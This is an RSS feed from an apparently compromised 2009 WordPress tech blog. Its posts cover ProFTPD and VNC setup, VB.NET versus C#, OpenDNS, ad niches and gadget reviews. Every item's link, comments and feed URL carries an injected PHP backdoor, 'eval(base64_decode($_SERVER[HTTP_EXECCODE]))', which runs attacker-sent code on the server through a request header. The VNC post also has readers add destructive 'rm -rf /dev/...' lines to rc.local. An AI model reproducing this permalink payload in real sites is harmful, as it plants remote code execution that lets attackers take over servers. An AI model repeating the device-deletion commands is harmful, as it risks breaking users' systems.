<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Techcrazies.com</title>
	<atom:link href="http://techcrazies.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://techcrazies.com</link>
	<description>The complete technology weblog.</description>
	<lastBuildDate>Thu, 27 May 2010 14:39:28 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Configure ProFTPD Server</title>
		<link>http://techcrazies.com/2009/08/15/configure-proftpd-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/08/15/configure-proftpd-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 15 Aug 2009 20:33:07 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[CentOS]]></category>
		<category><![CDATA[ProFTPD]]></category>
		<category><![CDATA[Yum]]></category>

		<guid isPermaLink="false">http://techcrazies.com/configure-proftpd-server/</guid>
		<description><![CDATA[When we want to connect to a system using FTP, there should already be a software running on it that knows how to handle the ftp connections. This software is called FTP server in general. ProFTPD is one such Ftp Server software. Today we will see how to install this software on your linux machine [...]]]></description>
			<content:encoded><![CDATA[<p>When we want to connect to a system using FTP, there should already be a software running on it that knows how to handle the ftp connections. This software is called FTP server in general. ProFTPD is one such Ftp Server software. Today we will see how to install this software on your linux machine or on CentOS machine to be specific.</p>
<div id="attachment_1684" class="wp-caption alignnone" style="width: 225px"><img class="size-full wp-image-1684" title="proftpd" src="http://techcrazies.com/wp-content/uploads/2009/08/proftpd.jpg" alt="ftp" width="215" height="92" /><p class="wp-caption-text">ftp</p></div>
<p>There are two ways to do this -<br />
First is to install it using the yum tool which comes built-in with most versions of the CentOS and may be this way to install ProFTPD will be preferred by most of us as it take less time and saves lot of our hard work.</p>
<p>Option1- Add the third party yum repository containing the required package as CensOS has no proFTPD package in its built in repositories.<br />
To do this we will have to edit the CenOS-Base.repo file by doing -<br />
vi /etc/yum.repos.d/CentOS-Base.repo</p>
<p>to the file add this :</p>
<p>[dag]<br />
name=Dag RPM Repository for Red Hat Enterprise Linux<br />
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag<br />
gpgcheck=1<br />
enabled=1</p>
<p>Finally ask yum to install it for you by typing this command -<br />
yum install proftpd</p>
<p>Option2- We can install it by using the source code. For this we need to download the required source code to install ProFTPD using -</p>
<p>wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.2.tar.gz</p>
<p>Then extract it using -<br />
tar xvfz proftpd-1.3.2.tar.gz</p>
<p>cd proftpd-1.3.2.tar.gz</p>
<p>Compile it using -<br />
./configure<br />
make<br />
make install</p>
<p>Thats it you are done. I have not mentioned how to configure PureFTPD here. It was just a tutorial to install it.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/08/15/configure-proftpd-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Difference between VB.NET and C SHARP.</title>
		<link>http://techcrazies.com/2009/08/11/difference-between-vbnet-and-c-sharp/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/08/11/difference-between-vbnet-and-c-sharp/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 11 Aug 2009 17:21:20 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Programming]]></category>
		<category><![CDATA[C SHARP]]></category>
		<category><![CDATA[VB .NET]]></category>
		<category><![CDATA[Visual Studio]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1677</guid>
		<description><![CDATA[A lot of people who want to get started with the Visual Studio .NET development don&#8217;t know the difference between Visual Basic .NET and C Sharp(#) .NET. My own condition was not different when I decided to learn the new framework provided by microsoft. Here&#8217;s what I found -
Basically there is a very little difference [...]]]></description>
			<content:encoded><![CDATA[<p>A lot of people who want to get started with the Visual Studio .NET development don&#8217;t know the difference between Visual Basic .NET and C Sharp(#) .NET. My own condition was not different when I decided to learn the new framework provided by microsoft. Here&#8217;s what I found -</p>
<p>Basically there is a very little difference between the two things as far as the features provided by them and the technology used are concerned. In fact the in both the cases the code written is not directly translated into the machine rather it is first converted to an intermediate representation called Microsoft Intermediate Language. Both VB .NET and C# .NET use the same intermediate representation which means the actual performance between two similar applications written in the two languages is practically zero because we can say that the intermediate code generated for both the programs will be exactly same. The main difference is in the syntax used by both the languages.</p>
<p><strong>Difference in syntax of Visual Basic .NET and C#</strong></p>
<p>The main reason why microsoft decided to include both the technologies in their Visual Studio product may be the user friendliness. Some of the coders who are have spent a lot of years in coding visual basic programs might not have adjusted so easily with the syntax of other languages lik c and c++. That is why a successor of visual basic was introduced which has all the features of the new generation along with the ease in use provided by visual basic. On the other hand the users who are familiar with the syntax of C, C++, etc. can use C sharp(#).</p>
<p><strong>Difference explained with example &#8211; </strong></p>
<p>In VB .NET -</p>
<blockquote><p>For i As Integer = 0 To 7<br />
TabControl1.TabPages(i).Text = &#8220;Tab: &#8221; + i.ToString()<br />
Next i</p></blockquote>
<p>In C SHARP</p>
<blockquote><p>for(int i = 0;i &lt; 8; i++){<br />
tabControl1.TabPages[i].Text = &#8220;Tab: &#8221; + i;<br />
}</p></blockquote>
<p>As we can clearly see that the code in VB .NET resembles the old VB code while the C SHARP code resembles the C family languages and Java. The noticeable difference can be seen in the curly brackets. The previous one do not include the use of them while the later one uses mainly curly braces as delimiters.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/08/11/difference-between-vbnet-and-c-sharp/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What are opendns servers and how can they improve your surfing experience ?</title>
		<link>http://techcrazies.com/2009/07/25/what-are-opendns-servers-and-how-can-they-improve-your-surfing-experience/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/07/25/what-are-opendns-servers-and-how-can-they-improve-your-surfing-experience/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 25 Jul 2009 05:29:31 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1675</guid>
		<description><![CDATA[We all are always searching for ways to improve the speed of the internet connection we are using may it be a dial-up connection, a DSL connection or any other connection we want it to be even faster. The basic thing about DNS servers is &#8220;THEY RESOLVE THE HOST NAME TO A SPECIFIC IP ADDRESS&#8221;.
When [...]]]></description>
			<content:encoded><![CDATA[<p>We all are always searching for ways to improve the speed of the internet connection we are using may it be a dial-up connection, a DSL connection or any other connection we want it to be even faster. The basic thing about DNS servers is &#8220;THEY RESOLVE THE HOST NAME TO A SPECIFIC IP ADDRESS&#8221;.</p>
<p>When we enter a web address in our browser (techcrazies.com) our browser doesn&#8217;t know where the site Techcrazies is located. To find the specific address of the site in terms of ip address the DNS server is contacted first which converts the hostname (techcrazies.com) to ip address (67.228.90.201) which is the exact address of the server which is hosting the site. In order to be able to retrieve the ip adress fast the DNS servers i.e the computers which do the conversion must be fast enough but the DNS servers that our ISPs provide are not fast enough. This is where OpenDNS comes into action. OpenDNS provides a reliable and faster DNS service and the best thing is it is totally free. They are having their DNS servers located all over the world from which the server which is located near you will be used to resolve your DNS queries.</p>
<div class="wp-caption alignnone" style="width: 414px"><img title="DNS Server" src="http://www.labnol.org/wp/images/2008/03/opendns-ip-address.png" alt="OpenDNS" width="404" height="116" /><p class="wp-caption-text">OpenDNS</p></div>
<p>The steps to use the DNS servers of OpenDNS are very easy. In windows XP open the my connections menu. Then go to the properties of the connection you are using, then scroll down to the bottom where you will find the TCP/IP properties following which change the values of the DNS servers to manual (if its initially automatic) and set the values to -</p>
<p>208.67.222.222<br />
208.67.220.220</p>
<p>OpenDNS not only provides a faster DNS service but also protects us from pishing sites, sites containing malware etc. You can even set shortcuts to your favourite sites and block unwanted sites if your family has children.</p>
<p>Happy Browsing.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/07/25/what-are-opendns-servers-and-how-can-they-improve-your-surfing-experience/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Setting up and trouble-shooting  Linux Remote Desktops using VNC server</title>
		<link>http://techcrazies.com/2009/05/26/setting-up-and-trouble-shooting-linux-remote-desktops-using-vnc-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/05/26/setting-up-and-trouble-shooting-linux-remote-desktops-using-vnc-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 25 May 2009 23:15:49 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1669</guid>
		<description><![CDATA[All of us webmasters have to move from shared to dedicated hosting some day when the traffic to our sites becomes more than what can be handled by shared servers or some of us decide to move to dedicated servers to ensure privacy and get complete control. Whatever may be the reason to move from [...]]]></description>
			<content:encoded><![CDATA[<p>All of us webmasters have to move from shared to dedicated hosting some day when the traffic to our sites becomes more than what can be handled by shared servers or some of us decide to move to dedicated servers to ensure privacy and get complete control. Whatever may be the reason to move from shared to dedicated environment we all prefer linux servers over windows this is because they are way cheaper than their windows counterparts. But a big concern to a new user is the user-friendliness of linux. This is mainly because most of the linux servers come with commandline based linux operating system pre-installed which is convenient for the web-server-experts who say &#8220;command line based operations are faster&#8221; but what about a general user who finds desktop systems more convenient.</p>
<div class="wp-caption aligncenter" style="width: 323px"><a href="http://techcrazies.com"><img title="Linux" src="http://foss.amrita.ac.in/site/files/linux-online-inc.jpg" alt="Linux" width="313" height="375" /></a><p class="wp-caption-text">Linux</p></div>
<p>Many different versions of desktop environments are available for all linux distributions which include GNOME and KDE which are the most widely used desktop environments for linux. If you are running a server with low resources then KDE is a better choice as it is a less resource hungry environment. Lets see the steps to install these desktop environments. I assume you have got the basic CentOS,Red-hat,ubuntu or Fedora installed from the data center of your server. Log in to the server using a SSH client like &#8220;Putty&#8221; as the root user.</p>
<p>In CentOS you can use the YUM tool to install KDE. Type the following command to install K Desktop environment.</p>
<blockquote><p>yum groupinstall kde-desktop</p></blockquote>
<p>This will install the KDE alongwith resolving all the dependencies. If you are on a VPS it may happen that you get an error &#8220;Server refused to allocate pty&#8221; while trying to login via SSH. This happens mainly on the openvz based VPS&#8217;s as while resolving the dependencies YUM may accdently install and enable the package &#8220;udev&#8221; which changes the startup configuration of the system and sometimes rendering it useless and inaccessible which means all your important data can be locked inside. In this case only the server administrator can help you solve the problem without loosing the data when you come accross &#8220;Server refused to allocate pty&#8221; error. A simple way to solve this problem by adding the following lines to the file &#8220;/etc/rc.local&#8221;</p>
<blockquote><p>/bin/rm -rf /dev/null<br />
/bin/rm -rf /dev/random<br />
/bin/rm -rf /dev/tty*<br />
/bin/rm -rf /dev/pty*<br />
/bin/mknod /dev/null c 1 3<br />
/bin/mknod /dev/random c 1 8<br />
/sbin/MAKEDEV tty<br />
/sbin/MAKEDEV pty</p></blockquote>
<p>This will force the system to allocate the devices every time the Machine is restarted. To install GNOME use the following command -</p>
<blockquote><p>yum groupinstall &#8220;X Window System&#8221; &#8220;GNOME Desktop Environment&#8221;</p></blockquote>
<p>After this has been done you will need to install the vnc server in order to access the desktop remotely. It can be done by the following command -</p>
<blockquote><p>yum install vnc-server</p></blockquote>
<p>This will make your server ready to accept remote deskop connections as soon as we start the server by starting the server and setting the password -</p>
<blockquote><p>vncpasswd &#8220;yourpasswd&#8221;</p></blockquote>
<p>Where your password is the password you desire to select and then you can start the server using -</p>
<blockquote><p>vncserver</p></blockquote>
<p>We need a vnc client to make connections to the server we just created. VNC clients are readily available for windows as well as linux which means you can access the desktop of your linux server using your windows machine. &#8220;real vnc viwer&#8221; is one such vnc viewer which is freely available. Following is to be entered in the vnc viewer to make the connection</p>
<blockquote><p>192.168.1.1:5901</p></blockquote>
<p>where 192.168.1.1 is the ip address of your server and 5901 is the port number on which the vnc server service runs by default.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/05/26/setting-up-and-trouble-shooting-linux-remote-desktops-using-vnc-server/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Which is the best paying niche ?</title>
		<link>http://techcrazies.com/2009/04/15/which-is-the-best-paying-niche/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/04/15/which-is-the-best-paying-niche/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 14 Apr 2009 22:31:31 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Internet marketing]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1659</guid>
		<description><![CDATA[Most of the webmasters are always confused about niche selection when it comes to starting a new website. Once common thing everyone deserves is that they should be able to earn more and more from it. For this the PPC value for that particular niche must be high. PPC value is ultimately determined by the [...]]]></description>
			<content:encoded><![CDATA[<p>Most of the webmasters are always confused about niche selection when it comes to starting a new website. Once common thing everyone deserves is that they should be able to earn more and more from it. For this the PPC value for that particular niche must be high. PPC value is ultimately determined by the amount paid by the advertisers for a particular keyword as we all know that google only pays a fraction of the money it charges the advertisers to the webmasters. So we need to choose a niche which is more sought after by the advertisers. Another thing to remember is that high paying keywords is equal to high competition so it is very difficult to rank good in search engines for it.</p>
<p>Lets now find out some of the high paying niches-</p>
<p>medicine<br />
mortgage<br />
jewellery<br />
insurance<br />
health<br />
weight-loss<br />
acne<br />
etc&#8230;.</p>
<div class="wp-caption alignnone" style="width: 411px"><img title="niche" src="http://bloggingfingers.com/wp-content/uploads/2007/07/niche-blogging-pie-chart.png" alt="niche" width="401" height="369" /><p class="wp-caption-text">niche</p></div>
<p>Any niche related to money pays better. Medicines and health also pays good.</p>
<p>It is also a know fact that the advertisers in United States pay more and hence the PPC obtained from US traffic is very high as compared to traffic from other countries. So which marketing a niche its better to keep in mind the United States visitors and surely you can atleast double your PPC for the same niche.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/04/15/which-is-the-best-paying-niche/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Adsense alternative for Indian publishers.</title>
		<link>http://techcrazies.com/2009/04/14/adsense-alternative-for-indian-publishers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/04/14/adsense-alternative-for-indian-publishers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 13 Apr 2009 23:33:14 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Internet marketing]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1656</guid>
		<description><![CDATA[Webmasters are facing a lot of problems with adsense specially Indians. The problems include difficulties in signing up, low CPM,etc. So most of us have made a search for adsense alternatives on google atleast once.
One good alternative is adsforindians.com. These guys are serving local Indian ads and the necessary condition to participate in their ad [...]]]></description>
			<content:encoded><![CDATA[<p>Webmasters are facing a lot of problems with adsense specially Indians. The problems include difficulties in signing up, low CPM,etc. So most of us have made a search for adsense alternatives on google atleast once.</p>
<p>One good alternative is adsforindians.com. These guys are serving local Indian ads and the necessary condition to participate in their ad campaign is that majority of your site traffic must be from India. One advantage of such local advertising companies is that visitors find much relevant advertisements there. When we take a look at the advertisements served by adsforindians a fact i noticed was some advertisements which are not traditionally seen on adsense and other companies like &#8220;flat for sale in pune&#8221; are seen. Obviously if the visitor finds the name of his area on the site he clicks the ad and opens it for curiosity even though he does not want to buy the flat. This dramatically increases the CTR.</p>
<p>Now lets also discuss the disadvantages of it. The most important disadvnatage is the that they pay flat rate of around 3-4Rs (0.07 &#8211; 0.09$) per click which is very less. Also if you have choosen your niche based on high paying adsense keywords you will still get the same rate. So the best option is to stick with adsense.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/04/14/adsense-alternative-for-indian-publishers/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Review of Amazon Kindle &#8211; an amazing ebook reader.</title>
		<link>http://techcrazies.com/2009/02/01/review-of-amazon-kindle-an-amazing-ebook-reader/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/02/01/review-of-amazon-kindle-an-amazing-ebook-reader/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 01 Feb 2009 12:38:47 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Cell phones]]></category>
		<category><![CDATA[Gadgets]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Kindle]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1648</guid>
		<description><![CDATA[Today i am going to review one of the best products avaiable out there at amazon.com for sales. The product is called &#8220;KINDLE&#8221;. Its a nice product which will revolutionize your book reading exeprience. This device is basically an ebook reader using which you can read your books anywhere and anytime without having to carry [...]]]></description>
			<content:encoded><![CDATA[<p>Today i am going to review one of the best products avaiable out there at amazon.com for sales. The product is called &#8220;KINDLE&#8221;. Its a nice product which will revolutionize your book reading exeprience. This device is basically an ebook reader using which you can read your books anywhere and anytime without having to carry all those bulky books with you. Its a stylish and compact ebook reader which will definitely catch the attenction of people when you take it out of your bag at public places.</p>
<dl class="wp-caption alignleft" style="width: 335px;">
<dt class="wp-caption-dt"><img title="AMAZON KINDLE" src="http://mashable.com/wp-content/uploads/2008/02/kindle.jpg" alt="AMAZON KINDLE" width="325" height="324" /></dt>
</dl>
<p>Coming to the technical specifications of the device, it has some amazing features that include a 7.5&#8243; by 5.3&#8243; screen which makes it easy to read the text. The display is crisp and bright which makes the reading experience even better. It has a memory of 256 mb means you can sore upto 200 of your favourite books on it. It also has a QWERTY keybord to input your text. It supports an SD expansion slot which means there is no limit on the storage memory. The other features if KINDLE include USB 2.0 support and a built in speaker which is very nice as far as the sound quality is concerned.</p>
<p>I called the KINDLE a revolutionary product in the begining heres the reason for that &#8211; Along with the outstanding features it also supports amazon&#8217;s &#8220;Whispernet&#8221; service  which works with EVDO mobile data transmission. That means you can always download new material from amazon using KINDLE. Overall its a nice product worth purchasing.</p>
<p>To read more about KINDLE visit <a href="http://www.kindlereview.org">Kindle Reviews</a> and to to know more about the advantages of kindle visit <a href="http://www.kindlereview.org/kindle_reviews.html">Kindle Advantages</a> .</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/02/01/review-of-amazon-kindle-an-amazing-ebook-reader/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to earn money from internet ?</title>
		<link>http://techcrazies.com/2009/01/27/how-to-earn-money-from-internet/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/01/27/how-to-earn-money-from-internet/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 27 Jan 2009 18:55:06 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Internet marketing]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1645</guid>
		<description><![CDATA[I am writing this article specially for newbies who want to learn the basics of earning money from the internet. Everyone of us have searched for the term &#8220;how to earn money from the internet ?&#8221; on google when we knew nothing about the world of internet. In this section i will cover the deatils [...]]]></description>
			<content:encoded><![CDATA[<p>I am writing this article specially for newbies who want to learn the basics of earning money from the internet. Everyone of us have searched for the term &#8220;how to earn money from the internet ?&#8221; on google when we knew nothing about the world of internet. In this section i will cover the deatils about the various programs and techniques that can be used to earn money on the internet. Some of us are earning a full time income from the internet while many others are atleast able to pay their phone and internet bills from it.</p>
<div class="wp-caption aligncenter" style="width: 370px"><img title="Earn money" src="http://www.germes-online.com/direct/dbimage/50313236/US_Dollar_Design_Synthetic_Leather_Fabric.jpg" alt="Earn money" width="360" height="360" /><p class="wp-caption-text">Earn money</p></div>
<p>This section is dedicated to various ways in you can earn from the internet. But you might ask a question &#8211; &#8220;what is so specail about it ? Every other site on the internet have these things on it but nothing proved to be helpful for me.&#8221; The most important thing is i will not only introduce you to the new internet earning programs  but also make you familier with  internet marketing ideas that i have learnt over time and which are proven work.</p>
<p>Here are the different programs that i am going to cover in brief-</p>
<p>1&gt; Google Adsense<br />
2&gt; Commission junction<br />
3&gt; Chitika<br />
4&gt; Amazon affiliate program<br />
5&gt; Ebay affiliate program<br />
6&gt;ClickBAnk affiliate program<br />
and much much more&#8230;&#8230;</p>
<p>Just keep in touch with the INTERNET MARKETING section only at TECHCRAZIES.COM</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/01/27/how-to-earn-money-from-internet/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Comparision of Blackberry STORM and IPHONE on occasion of the launch of the blackberry in India.</title>
		<link>http://techcrazies.com/2009/01/16/comparision-of-blackberry-storm-and-iphone-on-occasion-of-the-launch-of-the-blackberry-in-india/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/01/16/comparision-of-blackberry-storm-and-iphone-on-occasion-of-the-launch-of-the-blackberry-in-india/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Thu, 15 Jan 2009 21:16:06 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Cell phones]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1636</guid>
		<description><![CDATA[Vodafone launched the blackberry STORM officialy this week. It was eagerly awaited by all the blackberry fans. But the most important question that we all are having is &#8221; can it beat the features of the IPHONE ? &#8221; Lets do a quick  analysis of its advantages and disadvantages of it over apple&#8217;s iPhone 3G.
If [...]]]></description>
			<content:encoded><![CDATA[<p>Vodafone launched the blackberry STORM officialy this week. It was eagerly awaited by all the blackberry fans. But the most important question that we all are having is &#8221; can it beat the features of the IPHONE ? &#8221; Lets do a quick  analysis of its advantages and disadvantages of it over apple&#8217;s iPhone 3G.</p>
<p>If you are planning to buy a new phone, you might have read reviews of the blackberry which are available all over the internet. When Reliance mobile first announced the Blackberry Storm it was considered to be one of the iphone killers that are available in the market. But as soon as it reached in the hands of reviewers the IPhone turned out to be the winner again. Still the blackberry storm has many features which might attarct the business class. And if you think that these special features will be useful for you, go for it and try the storm definitely its not a bad phone.</p>
<p>These are some of the problems that we found while reviewing the Storm. One more thing we did not review the phone as most of other journalists do. What we did was use it for a couple of days and find the practical problems that a user might find in using it. Lets get to the point-</p>
<p>1&gt;The operating system of the Storm was found to be very buggy. This was the problem with the iphone too in the beginning but as soon as apple released the updates it was solved. We expect a quick update from Blackberry to fix these bugs.</p>
<p>2&gt; The screen has some polarizing issues. It needs to be pushed down to type, some people found this to be a cool thing while others just hated it.</p>
<p>3&gt; The operating system provided by blackberry is not as user-friendly as the Iphone conterpart. But i dont think this will be a problem for the users like me. Being a mobile-geek i am confident that i can use any complex device but this is a problem for the new users.</p>
<p>4&gt; I liked the camera as compared to the other blackberries but compared to the other phones in the market the picture quality is not so good. The picture was pale and not so sharp but still it is better than the iphone.</p>
<p>I will post the complete review of the phone after 2-3 days. Let me digg it for a few more days.</p>
<div class="wp-caption alignnone" style="width: 810px"><img title="Blackberry Storm" src="http://www.boygeniusreport.com/wp-content/uploads/thunderbig1.jpg" alt="Blackberry Storm" width="800" height="634" /><p class="wp-caption-text">Blackberry Storm</p></div>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/01/16/comparision-of-blackberry-storm-and-iphone-on-occasion-of-the-launch-of-the-blackberry-in-india/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Acer brings the aspire one netbook to Indian market.</title>
		<link>http://techcrazies.com/2009/01/12/acer-brings-the-aspire-one-netbook-to-indian-market/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://techcrazies.com/2009/01/12/acer-brings-the-aspire-one-netbook-to-indian-market/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 12 Jan 2009 19:48:31 +0000</pubDate>
		<dc:creator>amol shejole</dc:creator>
				<category><![CDATA[Gadgets]]></category>

		<guid isPermaLink="false">http://techcrazies.com/?p=1631</guid>
		<description><![CDATA[ 
Acer uncovers its latest gadget for the emerging Indian market the ASPIRE ONE NETBOOK. Its a samll sized version of a laptop which will be sold out at just 14499 INR only for the version with built in linux operating system and 16499 INR for the version with windows XP built in.
 
 S.Rajendran of Acer Indian [...]]]></description>
			<content:encoded><![CDATA[<div class="mceTemp"> </div>
<p>Acer uncovers its latest gadget for the emerging Indian market the ASPIRE ONE NETBOOK. Its a samll sized version of a laptop which will be sold out at just 14499 INR only for the version with built in linux operating system and 16499 INR for the version with windows XP built in.</p>
<p> <img title="acer aspire one " src="http://www.techshout.com/images/acer-aspire-one.jpg" alt="acer aspire one" width="450" height="320" /></p>
<p> S.Rajendran of Acer Indian explain reporters about the desire of Acer to reach the lower end market of India which has a lot of people who want to use a laptop but cannot afford to buy one. He also said that with this product the dream of millions of Indians to use mobile computing will come true with this launch. This product will also target the students who like such gadgets but dont have enough amount availble to buy one.</p>
<p>The features of the aspire one netbook inculde the Intel atom processor, 1 GB of RAM, 160 GB of hard drive and a long battery life of around 3 hours as claimed by the company. Definitely this configuration seems to be very impressive as far as the price range of the device is concerned.</p>
<p>The product is named as netbook as it mainly targets the people who want a device which will mainly be used for net surfing but it is not the only thing this tiny computer can do. Lets hope it to be another quality product from acer.</p>
]]></content:encoded>
			<wfw:commentRss>http://techcrazies.com/2009/01/12/acer-brings-the-aspire-one-netbook-to-indian-market/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
